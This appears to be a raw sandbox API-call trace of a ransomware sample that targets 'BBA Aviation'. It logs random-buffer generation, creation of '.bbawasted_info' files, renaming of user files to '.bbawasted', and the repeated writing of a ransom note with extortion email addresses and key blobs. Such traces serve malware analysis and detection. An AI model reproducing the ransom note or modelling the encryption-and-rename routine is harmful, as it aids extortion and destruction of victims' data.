(lpString="\\\\?\\C:\\Users\\FD1HVy\\Favorites\\Bing.url") returned 38 [0219.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x256) returned 0x6adb18 [0219.609] lstrcpyW (in: lpString1=0x6adb64, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0219.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0219.609] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a65f8) returned 1 [0219.610] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0219.610] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0219.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Favorites\\Bing.url.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\favorites\\bing.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0219.838] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0219.841] SetEndOfFile (hFile=0x28c) returned 1 [0219.841] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0219.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0219.841] lstrcpyW (in: lpString1=0x6adb64, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0219.841] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Favorites\\Bing.url" (normalized: "c:\\users\\fd1hvy\\favorites\\bing.url"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Favorites\\Bing.url.bbawasted" (normalized: "c:\\users\\fd1hvy\\favorites\\bing.url.bbawasted")) returned 1 [0219.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Favorites\\Bing.url.bbawasted" (normalized: "c:\\users\\fd1hvy\\favorites\\bing.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0219.846] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0219.846] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xd0 [0219.846] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd0) returned 0x5f0000 [0219.847] CloseHandle (hObject=0x294) returned 1 [0219.848] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0219.848] CloseHandle (hObject=0x290) returned 1 [0219.848] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0219.848] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a69b0) returned 1 [0219.850] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0219.850] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0219.851] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6460) returned 1 [0219.851] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0219.851] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0219.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0219.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0219.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0219.863] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]n6oOcfJTVhUrB7B4+9DHyQ7FNzfQO/3Rw/DWmxwel6jCkuSTgQuQveCt/ogD5dS6\r\ntWzFvaj5NyRbt5TdH2U+4mzPBEfOy68Ngm+aYxnmT+LtSngyTOzmioK31QSjQHP7\r\nfPkm/hYUGttdPfWkdxvJFik8Co/GGgd5743w563Cih9ASPJ7BWLu9W2fsrKRGsSo\r\nwZgXUQz4kpMPLX5dLP9YOsUQ16qRL019vy7emkcVj9QG5Yi99xOZ8KG5TFfxgsi9\r\nXU+7rvPhjfbPTeMWC4jIyQ01iQkPaF6z5MqoVZ0wj3UW/2gASvoLWgIWAO+ul1Rx\r\niPaLXs04WsTbhZZTew9rBcBAbG+TZdilI3s8sHtMgFiDzv9eVpCjkVer3uqcUapR\r\nvaTccRsZKiOr6R/KDqPGMaHTcSnKAlRMMai3UwueuqgWXSRhb+4oGDvL50bZ490p\r\nbaxr9FHvvJ9GtDFCXYIKwdkD1qjbClt41SlFNUI1v3mhVzRmVXOMx+2EbBLFu0Il\r\n5ndbgQu2oQjSMp6TdjY6WyihU2gvKbbQLaP/2PSrz60aWRT2ynHk62DEuCCDCc04\r\njSCyzIim4IjXWX3jjPKZSaRbbG4f+QHvJ2pVKCawbrIWhEG59MBKXVTwEWgfNcR8\r\nM/rNYUbLPovK/rnqdyeRrAiQ+Ruul6cE2jgb3E5lhH5=[end_key]\r\nKEEP IT\r\n") returned 984 [0219.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0219.863] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0219.864] SetEndOfFile (hFile=0x28c) returned 1 [0219.867] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0219.867] CloseHandle (hObject=0x28c) returned 1 [0219.867] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0219.867] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b3f80 | out: hHeap=0x660000) returned 1 [0219.867] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6570) returned 1 [0219.868] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0219.868] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0219.868] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\Hv7lwT931H-Q.wav") returned 76 [0219.868] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2a2) returned 0x6aecf0 [0219.868] lstrcpyW (in: lpString1=0x6aed88, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0219.868] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0219.868] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6680) returned 1 [0219.869] CryptGenRandom (in: hProv=0x6a6680, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0219.869] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0219.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\Hv7lwT931H-Q.wav.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\hv7lwt931h-q.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0219.870] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0219.872] SetEndOfFile (hFile=0x28c) returned 1 [0219.872] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0219.872] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0219.872] lstrcpyW (in: lpString1=0x6aed88, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0219.872] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\Hv7lwT931H-Q.wav" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\hv7lwt931h-q.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\Hv7lwT931H-Q.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\hv7lwt931h-q.wav.bbawasted")) returned 1 [0220.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\Hv7lwT931H-Q.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\hv7lwt931h-q.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0220.048] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0220.048] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x4465 [0220.049] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4465) returned 0x5f0000 [0220.049] CloseHandle (hObject=0x290) returned 1 [0220.050] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0220.050] CloseHandle (hObject=0x27c) returned 1 [0220.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0220.050] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a5f98) returned 1 [0220.051] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0220.051] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0220.051] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6818) returned 1 [0220.052] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0220.052] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0220.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0220.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0220.064] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0220.064] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]CGqpYE14q7kF6deT0W4GZ8fyOfuyENjDLtN16yDGE5qNE3CJFWUeqUAn2lXE0DwV\r\naAPITjb75GgO0w5NCjI9bz2xvRQ1yN3Qc1D6B9b86e1XW5W/Y0fZ1r9O/DuugaTU\r\nuhozHtXi9+yBQAuEYKgDkJccyTSwYDfpZb+eR6mj6adte4Emvsc5xhp01+OQQvwV\r\njoTksh4zfTtBD14Nxy9Ef2aVnPx3XZZeinpXX4X+BeqWHPF2tm/TXAmGjCXGzrdt\r\nX3kY9WjIgRSURSrhEouMNzIxy9zI9ntLfJuaDBjfLdnCUaYdKGS8EE+ApIgbUtuc\r\n+AHEYwXxniG9l2omfsFjSGEyjpHj0iE1xXbhJsdhhonkS+RlKHpjTsXToPnZMm6I\r\nq6xqrAdUe2xh5rl86ACSBwY1WnRQT6/4tuHtqsvsJsl/WnnnH1xTZ48E/zQpl0dX\r\nanX47XdpUJrokVGm7RSqS0LeANJfpExDIrLc5n95cUBsmqdxFA/azkHooZUh3mmn\r\npbu+tfnlgjpX/fGwZ45uAy7uXsgmF+NGD1h8B1bgLEjjINq/IOLdFbTya+Ad2ymI\r\nunw4gvwXbArPZk70CloVav17RxCE4Iv1UXxvScLQ+XiFbrRnXW2CJ/CgqfOV9TnC\r\nFB5NRWODam/BmfTmVB1PxGmf9s3UzqZUYvgjaWPH0On=[end_key]\r\nKEEP IT\r\n") returned 984 [0220.064] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0220.064] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0220.065] SetEndOfFile (hFile=0x28c) returned 1 [0220.068] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0220.068] CloseHandle (hObject=0x28c) returned 1 [0220.068] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0220.068] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8b18 | out: hHeap=0x660000) returned 1 [0220.068] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a61b8) returned 1 [0220.069] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0220.069] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0220.069] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\puj9Ajr y.wav") returned 73 [0220.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x29c) returned 0x6aecf0 [0220.069] lstrcpyW (in: lpString1=0x6aed82, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0220.069] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0220.069] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6020) returned 1 [0220.070] CryptGenRandom (in: hProv=0x6a6020, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0220.070] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0220.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\puj9Ajr y.wav.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\puj9ajr y.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0220.071] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0220.072] SetEndOfFile (hFile=0x28c) returned 1 [0220.073] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0220.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0220.073] lstrcpyW (in: lpString1=0x6aed82, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0220.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\puj9Ajr y.wav" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\puj9ajr y.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\puj9Ajr y.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\puj9ajr y.wav.bbawasted")) returned 1 [0220.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\puj9Ajr y.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\puj9ajr y.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0220.074] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0220.074] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x15dfa [0220.074] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15dfa) returned 0x5f0000 [0220.075] CloseHandle (hObject=0x27c) returned 1 [0220.079] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0220.080] CloseHandle (hObject=0x290) returned 1 [0220.080] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0220.080] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6ce0) returned 1 [0220.081] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0220.081] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0220.081] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a64e8) returned 1 [0220.082] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0220.082] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0220.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0220.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0220.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0220.360] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Rxbk2Bd1FfnGz2X2+qvV99DWUKMZd4mAYDn6Gc+dsWJqwyAKcbg5BhXjTYKZp73Y\r\n1doPkEmjRrHtgW6pDrHfVE+Cv8rF+60TZijABxhiWUkMv/DDiM4bc3kQl4AWxrho\r\n10WQc5QaaP1+oeoh/EPF4wkQdVs9LwpYOD/WRSciP4RNvRspd2tw7HpijNl3Crfi\r\ny/JO936Bd709Hc8U0U07XzePd3H47C94bGFN+IvwmdM9NYIUto32y4ZpZjqpyBtj\r\nMwMDSn9/MmFw9shs1WlsS7AROnVjRndaXRipbseTyq+0Rn36bgMlWvYJh36E7Z+I\r\ntnJcgbw6lWLYZNm0cEureE28rzNaHl1AHM0iL46QPiwuQWOHdZzcxvUF6GZYwN0k\r\nNm1iPdmuRGkLUkyZDdl4xIN9A6mJRbVRm12mOApseqVRMY8j/M2YY1mRLl7Fisjl\r\nb9CF78/IQD5JB7bTaitgS+KQNIhmlpkM0yFN0cEStP4ksdmS3HJF+zcfeaKvvjuq\r\nHinlSlP0Cm+GSNsVYnTqL+CnGxnig7T1eI+Fp0UtTE4HIxbWSnvQcck9f6bMLEHB\r\niYMgdG8XYxP4muxq8IIlSEok40XMyZB8EBf/+YuuhvZwznspht18Hgk3/QM1q69o\r\nDX2mGB94VSo+oq/K7LLlJ85zyRvo72KLwob/aNRNW5h=[end_key]\r\nKEEP IT\r\n") returned 984 [0220.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0220.360] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0220.360] SetEndOfFile (hFile=0x28c) returned 1 [0220.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0220.363] CloseHandle (hObject=0x28c) returned 1 [0220.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0220.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8d10 | out: hHeap=0x660000) returned 1 [0220.364] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6928) returned 1 [0220.365] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0220.365] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0220.365] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\6cps4Q.wav") returned 89 [0220.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2bc) returned 0x6c4b88 [0220.365] lstrcpyW (in: lpString1=0x6c4c3a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0220.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0220.365] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5f98) returned 1 [0220.366] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0220.366] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0220.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\6cps4Q.wav.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\6cps4q.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0220.499] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0220.501] SetEndOfFile (hFile=0x280) returned 1 [0220.504] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0220.504] HeapFree 